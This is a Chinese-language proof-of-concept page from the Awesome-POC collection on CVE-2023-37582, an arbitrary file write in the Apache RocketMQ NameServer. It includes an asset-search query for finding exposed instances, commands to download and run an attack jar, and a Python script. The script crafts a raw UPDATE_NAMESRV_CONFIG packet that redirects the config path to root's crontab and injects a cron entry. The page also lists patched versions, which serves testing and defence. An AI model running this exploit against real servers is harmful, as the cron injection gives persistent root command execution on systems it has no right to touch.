admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582.md
Threekiii 2b9d17c3d2 update CVE-2023-37582
2025-02-10 14:01:45 +08:00

89 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582
## 漏洞描述
Apache RocketMQ 是一个分布式消息和流处理平台,具有低延迟、高性能和可靠性、万亿级容量和灵活的可扩展性。
在 RocketMQ 版本 5.1.1 及以下版本中NameServer 组件存在一个任意文件写入漏洞。该漏洞存在于 RocketMQ 的 NameServer 组件的配置更新功能中。通过向 NameServer 发送 `UPDATE_NAMESRV_CONFIG` 命令,攻击者可以修改 `configStorePath` 配置项及其内容,从而导致任意文件写入。
该漏洞源于对 [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246) 的不完全修复。在处理 CVE-2023-33246 时,官方团队建立了一个不能被修改的配置项黑名单。然而,补丁错误地将黑名单指定为 `configStorePathName`,而应该是 `configStorePath`,导致了这一结果。
参考链接:
- https://github.com/apache/rocketmq/pull/6843
- https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
## 漏洞影响
```
RocketMQ < 4.9.7
RocketMQ < 5.1.2
```
## 网络测绘
```
title="RocketMQ"
```
## 环境搭建
Vulhub 执行如下命令启动一个 RocketMQ NameServer 5.1.0
```shell
docker compose up -d
```
环境启动后RocketMQ 的 NameServer 将会监听在 9876 端口。
## 漏洞复现
使用这个 Vulhub 项目 [rocketmq-attack](https://github.com/vulhub/rocketmq-attack) 来复现漏洞并写入任意文件:
```shell
wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --file "/tmp/awesome_poc" --data "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
```
执行完成后,可以验证文件是否写入成功:
```shell
cat /tmp/awesome_poc
```
![](images/Apache%20RocketMQ%20NameServer%20任意文件写入漏洞%20CVE-2023-37582/image-20250210115056589.png)
定时任务:
```python
import socket
import binascii
client = socket.socket()
# you ip port(9876)
client.connect((target_ip,target_port))
# data
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":435}'.encode('utf-8')
body='configStorePath=/var/spool/cron/crontabs/root\nbrokerConfigPath=/var/spool/cron/crontabs/root\nbindAddress=0.0.0.0\\n*/1 * * * * touch /tmp/success'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
print(head1)
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
print(head2)
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
```
## 漏洞修复
目前官方已发布安全版本,建议受影响用户升级至:
- RocketMQ 5.x >= 5.1.2
- RocketMQ 4.x >= 4.9.7
官方补丁下载地址: https://rocketmq.apache.org/download/ ,同时建议将 NameServer、Broker 等组件部署在内网,并增加权限认证。
Reference in New Issue View Git Blame Copy Permalink